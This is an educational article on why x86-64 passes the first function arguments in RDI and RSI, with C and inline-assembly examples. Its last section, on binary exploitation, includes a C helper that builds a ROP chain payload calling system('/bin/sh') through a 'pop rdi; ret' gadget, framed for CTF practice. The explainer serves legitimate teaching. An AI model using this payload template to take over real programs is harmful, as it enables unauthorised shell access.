The “Unwritten Rule” of RDI as the First Argument
Table of Contents
- The “Unwritten Rule” of RDI as the First Argument
- 1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
- 2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
- 3. Practical Significance: Impact on Pwn and Reverse Engineering
This question gets to the core of low-level design. Why does the calling convention name RDI as the first argument and RSI as the second? Why not pick two arbitrary registers instead, such as R8 and R9?
The reasons behind this can mainly be summarized in two points: the continuation of hardware legacy and extreme performance optimization.
1. Hardware Legacy: Enabling “Zero-Cost” Calls to System Instructions
In C, many fundamental functions take their arguments in the order “destination, source”. The most typical example is memcpy(dest, src, size).
- RDI: the D stands for Destination.
- RSI: the S stands for Source.
The brilliance of the design:
The x86 architecture has some very powerful built-in “string instructions” (such as movsb). These instructions are hard-wired into the CPU circuitry, and they mandate the use of RSI as the source and RDI as the destination.
If the calling convention (ABI) specifies that the first argument goes into RDI and the second into RSI, then when you write memcpy(dest, src, n):
- `dest` is already in RDI.
- `src` is already in RSI.
- The CPU does not need extra `mov` instructions to shuffle the two pointers. Only the byte count, which arrives in RDX as the third argument, has to be moved into RCX before `rep movsb` can do the copy.
Conclusion: this design allows high-frequency C functions (such as string processing and memory copying) to connect directly to the CPU’s hardware-accelerated instructions.
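As a rough illustration of the point above, the sketch below copies bytes with `rep movsb` through GCC/Clang extended inline assembly. The function name `copy_bytes` is made up for this example, the inline-assembly syntax is a compiler extension rather than standard C, and a plain loop is compiled as a fallback on other targets. Real memcpy implementations are considerably more elaborate.

```c
#include <stddef.h>

/* Hypothetical helper (not a library function): copies n bytes from src to dest. */
void *copy_bytes(void *dest, const void *src, size_t n) {
    void *ret = dest;
#if defined(__x86_64__) && (defined(__GNUC__) || defined(__clang__))
    /* The constraints pin each operand to the register rep movsb requires:
       "D" = RDI (destination), "S" = RSI (source), "c" = RCX (count). */
    __asm__ volatile("rep movsb"
                     : "+D"(dest), "+S"(src), "+c"(n)
                     :
                     : "memory");
#else
    /* Portable fallback for other architectures or compilers. */
    unsigned char *d = dest;
    const unsigned char *s = src;
    while (n--) *d++ = *s++;
#endif
    return ret;
}
```

Because `dest` and `src` already arrive in RDI and RSI under the System V convention, the compiler typically has nothing to rearrange for the two pointers here.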
2. Performance Revolution: Evolving from the “Memory Era” to the “Register Era”
In the old 32-bit (x86) era, the common calling conventions (such as cdecl) placed function arguments on the stack.
- Drawback: the stack resides in memory, and CPU access to memory is far slower than access to registers. Every function call required writing to memory and reading from memory, which was highly wasteful.
By the 64-bit (x86-64) era, more registers became available. Engineers established a set of rules (the System V ABI) that passes the first 6 integer or pointer arguments through registers, in the order RDI, RSI, RDX, RCX, R8, R9.
Why this particular order?
It works like a “standard protocol.” Without such a rule:
- Programmer A might write a function assuming the first argument is in RAX.
- Programmer B might write code that passes the argument in RBX.
- Result: the program crashes immediately.
The purpose of uniformly specifying RDI, RSI, … is to ensure that compilers, operating systems, and code written in different languages can communicate with each other seamlessly. It is like everyone agreeing to drive on the right side of the road.
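To make the “standard protocol” idea concrete, here is a small sketch in which a hand-written assembly routine and compiler-generated C code cooperate only because both follow the System V convention. The routine name `second_arg` is invented for this example, and the top-level `__asm__` block assumes GCC or Clang on x86-64 Linux; on any other target a plain C fallback is compiled instead.

```c
#if defined(__x86_64__) && defined(__linux__) && defined(__GNUC__)
/* Hand-written routine (hypothetical name): it returns whatever is in RSI,
   which under the System V ABI is the second integer argument. */
__asm__(
    ".pushsection .text\n"
    ".globl second_arg\n"
    ".type second_arg, @function\n"
    "second_arg:\n"
    "    movq %rsi, %rax\n"   /* RAX carries the return value */
    "    ret\n"
    ".popsection\n"
);
long second_arg(long a, long b);
#else
/* Fallback so the example still builds on other platforms. */
long second_arg(long a, long b) { (void)a; return b; }
#endif
```

For a call such as `second_arg(10, 20)`, the C caller never mentions RSI. The compiler puts 20 there because the ABI says so, and the assembly routine reads it from the same place.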
3. Practical Significance: Impact on Pwn and Reverse Engineering
For students learning binary security (Pwn), understanding this is crucial:
- Finding gadgets: when constructing a ROP chain, you often need to control the first argument (for example, `system("/bin/sh")`). Since you know the rule is RDI, you will specifically look for instruction snippets like `pop rdi; ret`.
- Quickly locating vulnerabilities: when you see code in a disassembler (such as IDA) passing a strange address into RDI and then calling a function, you can immediately realize: “Oh, it is setting up the first argument of that function.”
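The gadget idea above can be sketched as a payload layout for a practice (CTF-style) binary. Everything here is an assumption for illustration: the helper names `put_u64` and `build_chain` are made up, and the padding length and the three addresses must come from the specific binary being studied.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Write a 64-bit value in little-endian byte order, as it would sit on the x86-64 stack. */
static size_t put_u64(uint8_t *buf, size_t off, uint64_t v) {
    for (int i = 0; i < 8; i++)
        buf[off + i] = (uint8_t)(v >> (8 * i));
    return off + 8;
}

/* Layout: [padding][addr of "pop rdi; ret"][addr of "/bin/sh"][addr of system]
   buf must hold at least pad_len + 24 bytes. Returns the payload length. */
size_t build_chain(uint8_t *buf, size_t pad_len, uint64_t pop_rdi_ret,
                   uint64_t binsh, uint64_t system_addr) {
    size_t off = pad_len;
    memset(buf, 'A', pad_len);               /* filler up to the saved return address */
    off = put_u64(buf, off, pop_rdi_ret);    /* first return: the gadget */
    off = put_u64(buf, off, binsh);          /* popped into RDI = first argument */
    off = put_u64(buf, off, system_addr);    /* gadget's ret jumps here */
    return off;
}
```

The order mirrors the calling convention: the gadget loads the string's address into RDI, and only then does control reach `system`. Real targets may also need an extra `ret` gadget to keep the stack 16-byte aligned; that is left out of this sketch.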
Summary Comparison Table
| Dimension | Old Era (32-bit/x86) | New Era (64-bit/x86-64) | Benefits |
|---|---|---|---|
| Storage location | Stack (in memory) | Registers (RDI, RSI…) | Fast (no round trip to memory, which is far slower than a register read) |
| Instruction count | Requires multiple push/pop operations | Simple mov is enough | Smaller code size and higher execution efficiency |
| Logical consistency | Arbitrary | Strictly follows Dest/Source logic | Hardware-level optimization, reducing the cost of data movement |
When a function has more than 6 arguments, the registers are no longer sufficient and the remaining arguments are “forced” onto the memory stack.